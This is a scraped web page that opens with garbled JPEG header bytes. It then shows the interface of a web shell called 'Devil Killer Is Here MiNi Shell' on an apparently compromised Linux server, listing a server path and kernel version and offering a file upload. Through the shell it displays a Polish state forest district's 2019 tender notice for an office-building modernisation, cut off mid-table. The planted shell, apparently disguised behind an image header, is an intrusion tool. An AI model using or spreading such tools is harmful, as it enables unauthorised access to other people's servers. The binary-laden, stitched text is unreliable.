JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190515/548178-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 548178-N-2019 z dnia 2019-05-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Nadleśnictwo Połczyn</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Modernizacja budynku biurowego Nadleśnictwa Połczyn wraz z zagospodarowaniem terenu i infrastrukturą towarzyszącą - kontynuacja</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Nadleśnictwo Połczyn</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">33004428100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Szczecinecka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">12</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">78-320</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Połczyn-Zdrój</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">943 662 230, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">polczyn@szczecinek.lasy.gov.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">943 662 230</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka organizacyjna Lasów Państwowych nie posiadająca osobowości prawnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty nalezy przesłać lub złożyć osobiście w tmczasowej siedzibie Zamawiającego w zamkniętej i opisanej kopercie.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Szczecinecka 12, 78-320 Połczyn-Zdrój lub osobiście w siedzibie tymczasowej przy ul.Piwnej 6, 78-320 Połczyn-Zdrój - sekretariat</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Modernizacja budynku biurowego Nadleśnictwa Połczyn wraz z zagospodarowaniem terenu i infrastrukturą towarzyszącą - kontynuacja</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SA.270.1.4.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest robota budowlana polegająca na kontynuacjimodernizacji budynku biurowego Nadleśnictwa Połczyn wraz z zagospodarowaniem terenu i infrastrukturą towarzyszącą nadziałce nr 120/37 obr.006 Połczyn-Zdrój, położonej przy ul. Szczecineckiej 12 w Połczynie-Zdroju. Szczegółowy opisprzedmiotu zamówienia zawarty został w przedmiarze robót, dokumentacji technicznej (projektowej), inwentaryzacjipowykonawczej - przedmiary różnicowe, Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załączniki nr 1 doSIWZ, w skład którego wchodzą następujące dokumenty: 1. Projekt architektoniczno-budowlany, zatwierdzony decyzją nr63/2017 Starosty Świdwińskiego w dniu 28.03.2017 (AB.670.37.2017) oraz decyzją nr 339/2018 Starosty Świdwińskiego z dnia13.11.2018 (AB.6740.338.2018) zmieniającą decyzję nr 63/2017, składający się z: - projektu architektonicznego zzagospodarowaniem terenu; - projektu konstrukcyjnego; - ekspertyzy technicznej; - projektu instalacji sanitarnych wewnętrznych;- projektu instalacji sanitarnych zewnętrznych; - projektu instalacji elektrycznych wewnętrznych; - projektu instalacjielektrycznych zewnętrznych; - projektu instalacji teletechnicznych; - projektu drogowego; - charakterystyki energetycznej; -dokumentacji badań podłoża gruntowego wraz z opinią geotechniczną; - projektu zamiennego do decyzji z dnia 13.11.2018(AB.6740.338.2018); - projektu przyłącza wodociągowego. 2. Projekty wykonawcze: - projekt architektoniczny; - projektinstalacji wod-kan; - projekt instalacji zewnętrznych wod-kan; - projekt wykonawczy - branża konstrukcyjna; - projekt instalacjiteletechnicznych; - projekt instalacji elektrycznych zewnętrznych; - projekt instalacji elektrycznych wewnętrznych; - projektinstalacji wentylacji i klimatyzacji; - projekt instalacji co, kotłowi gazowej, instalacji gazowej; - projekt drogowy. 3. Przedmiaryróżnicowe: - Przedmiar różnicowy konstrukcja i architektura obiektów kubaturowych; - Przedmiar różnicowy prace drogowe; -Przedmiar różnicowy zagospodarowanie terenu; - Przedmiar różnicowy instalacje co i kotłownia gazowa; - Przedmiar różnicowyinstalacje wentylacji i klimatyzacji; - Przedmiar różnicowy wewnętrzne instalacje wod-kan; - Przedmiar różnicowy sieci iprzyłącza instalacji wod-kan; - Przedmiar różnicowy wewnętrzne instalacje elektryczne; - Przedmiar różnicowy instalacjeteletechniczne; - Przedmiar różnicowy zewnętrzne instalacje elektryczne. 4. Specyfikacja Techniczna Wykonania i OdbioruRobót. 5. Projekt aranżacji wnętrz - Tom I, II wraz z opisem. 6. Decyzje administracyjne, uzgodnienia i pozostałe dokumentyzwiązane z realizacją planowanej inwestycji: - pozwolenie na budowę - decyzja nr 63/2017 Starosty Świdwińskiego z dnia28.03.2017 roku; - decyzja nr 339/2018 Starosty Świdwińskiego z dnia 13.11.2018 (AB.6740.338.2018) zmieniająca decyzję nr63/2017; - zgłoszenie robót budowlanych nr AB.6743.14.2019 na budowę przyłącza wodociągowego. 3.4. Zakres prac obejmuje:Kontynuację przebudowy budynku biurowego poprzez wykonanie następujących zadań: 1) pokrycie i odwodnienie dachów,stolarka, ścianki działowe, tynki, posadzki, ślusarka, okładziny i wymalowania, elewacja budynku, prace zewnętrzne; 2)dokończenie instalacji c.o.; 3) wykonanie systemu sygnalizacji pożaru (SSP), systemu alarmu włamania i napadu (SAWIN),instalacji kontroli dostępu, instalacji rozgłoszeniowej, instalacji CCTV monitoringu oraz instalacji domofonowej, dostawa iinstalacja urządzeń multimedialnych; 4) wykonanie i montaż przewodów wentylacyjnych wraz z izolacjami, wykonanierurociągów klimatyzacyjnych, dostawa i zainstalowanie agregatów chłodzących, zainstalowanie układów sterowania,uruchomienie systemu; 5) ułożenie rur wodociągowych i kanalizacyjnych, wykonanie studni rewizyjnych i odwodnień na trasachkanałów, montaż separatora i osadnika, zasypanie wykopów po pracach instalacyjnych; 6) wykonanie rurociągów instalacjiwodnych, montaż armatury, osprzętu, malowanie i izolacje rurociągów, wykonanie rurociągów kanalizacji sanitarnej, montażarmatury i osprzętu sanitarnego; 7) wykonanie i zamontowanie rozdzielni, ułożenie przewodów i montaż osprzętu elektrycznegooraz opraw oświetleniowych, wykonanie instalacji połączeń wyrównawczych i odgromowej, badania i pomiary; 8) wykonanie isprawdzenie linii kablowej zasilającej, dostawa i zainstalowanie agregatu prądotwórczego wraz z linią kablową zasilającą,wykonanie oświetlenia zewnętrznego; 9) wykonanie murku oporowego wraz balustradą przy schodach terenowych, wykonaniestanowisk oraz dostawa zabudów śmietnikowych prefabrykowanych; dostawa i montaż nowego masztu radiowego, elementyurządzenia terenu, trawniki i krzewy; 10) wykonanie makroniwelacji terenu, korytowanie i wyrównanie podłoży, ustawieniekrawężników na ławach, wykonanie podbudów oraz nawierzchni jezdni, placów, miejsc postojowych, ustawienie znaku STOP;3.5. Unormowania, których Wykonawca będzie zobowiązany w szczególności przestrzegać przy realizacji przedmiotuzamówienia 1) Podstawowe akty prawne: - ustawa z dnia 28 września 1991 r. o lasach (Dz.U. z 2018r. poz. 2129), - ustawa z dnia16 kwietnia 2004 r. o ochronie przyrody (Dz.U. z 2018r. poz. 1614), - ustawa z dnia 7 lipca 1994 r. - Prawo budowlane (Dz.U. z2018r. poz. 1202), - rozporządzenie Ministra Środowiska z dna 22 marca 2006 r. w sprawie szczegółowych zasad zabezpieczeniaprzeciwpożarowego lasów (Dz. U. z 2006 r. Nr 58, poz. 405 z późn. zm.), - rozporządzenie Ministra Spraw Wewnętrznych iAdministracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych iterenów (Dz. U. z 2010 r. Nr 109, poz. 719 z późn. zm.), - rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. wsprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2015 r. poz. 1422 późn. zm.).3.6. Zasady ogólne realizacji przedmiotu zamówienia. 1) Przedmiot zamówienia zostanie wykonany w zakresie określonym wprojektach budowlanych oraz Specyfikacji Technicznej Wykonania i Odbioru Robót - zgodnie z przyjętą ofertą oraz SpecyfikacjąIstotnych Warunków Zamówienia dla zamówienia publicznego. W ramach zamówienia Wykonawca jest zobligowany pozyskaćwszelkie niezbędne do prawidłowego wykonania zamówienia decyzje, zezwolenia, pozwolenia i zgody - na podstawiepełnomocnictwa udzielonego Wykonawcy przez Zamawiającego. 2) Realizacja powyższego zakresu zamówienia winna byćwykonana w oparciu o obowiązujące przepisy, przez osoby o odpowiednich kwalifikacjach i uprawnieniach. 3) Wykonawcaprowadzić będzie roboty w oparciu o własne materiały i narzędzia. 4) Materiały i urządzenia, które zostaną użyte podczaswykonania niniejszego zamówienia powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu istosowania w budownictwie określonym w przepisach powszechnie obowiązującego prawa, w tym w ustawie z dnia 7 lipca 1994roku Prawo budowlane (Dz. U. z 2016 r. poz. 290 ze zm.), zwaną dalej ustawą Prawo budowlane i w ustawie z dnia 8 września2016 r. o wyrobach budowlanych (Dz. U. 2016 r., poz. 1570 ze zm.), a także wymaganiom narzuconym w dokumentacjitechnicznej (projektowej) oraz Specyfikacji Technicznej Wykonania i Odbioru Robót, projekcie aranżacji budynku biurowego. 5)Wykonawca zobowiązuje się wykonać roboty zgodnie z wymogami określonymi w dokumentacji przetargowej, zasadami wiedzytechnicznej oraz obowiązującymi przepisami i normami. 6) Zamawiający oświadcza, ze posiada prawo do dysponowanianieruchomością na cele budowlane w postaci zarządu. Zamawiający nie zapewnia źródła energii elektrycznej i wody. 7)Zamawiający nie ogranicza zakresu przedmiotu zamówienia, który może być powierzony podwykonawcom. W zakresiepodwykonawstwa zastosowanie mają przepisy określone w art. 143b-d PZP oraz w zapisy umowie, której wzór stanowi załączniknr 11 do SIWZ. 8) W terminie 5 dni od dnia zawarcia umowy Wykonawca przedstawi Zamawiającemu harmonogram rzeczowo -finansowy robót budowlanych, zgodnie z którym będzie realizowane zamówienie. Harmonogram rzeczowo - finansowy robótbudowlanych będzie sporządzony z podziałem robót do wykonania. Poszczególne pozycje robót muszą być naniesione zuwzględnieniem daty rozpoczęcia robót oraz daty zakończenia tych robót. W planowaniu czasu potrzebnego na wykonanieposzczególnych robót Wykonawca uwzględni przerwy wynikające z przyczyn technologicznych i atmosferycznych, typowych dlaokresu letnio - jesiennego, itp. Ponadto Wykonawca uwzględni inne okoliczności mogące mieć wpływ na terminowośćwykonania niniejszego zamówienia. 9) W przypadku, gdy w dokumentacji technicznej Zamawiający określił przedmiotzamówienia poprzez wskazanie znaków towarowych, patentów lub pochodzenia dopuszcza się możliwość składania ofertrównoważnych. Określenie przedmiotu zamówienia ma charakter wyłącznie pomocniczy w przygotowaniu oferty i ma na celuwskazać oczekiwane standardy co do minimalnych parametrów technicznych oczekiwanych materiałów i urządzeń. Przez ofertęrównoważną należy rozumieć ofertę o parametrach technicznych wytrzymałościowych, jakościowych, wydajnościowychrównoważnych z opisem wskazanym przez Zamawiającego. Pod pojęciem ,,parametry" rozumie się funkcjonalność,przeznaczenie, kolorystykę, strukturę, materiały, kształt, wielkość, bezpieczeństwo, wytrzymałość, itp. W związku z powyższymZamawiający dopuszcza możliwość zaoferowania produktów o innych znakach towarowych, patentach lub pochodzeniu,natomiast nie o innych właściwościach i funkcjonalności niż określone w dokumentacji technicznej. 10) Obowiązki stawianeWykonawcy przez Zamawiającego dotyczące realizacji przedmiotu umowy, które mają wpływ m.in. na cenę oferty zostałyszczegółowo opisane we wzorze umowy stanowiącym załącznik nr 11 do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233142-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45315700-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32320000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45100000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45110000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111291-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112710-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45223100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231400-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233220-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233300-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45260000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262500-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262650-2</TD></TR><TR><TD style='border: 1px solid 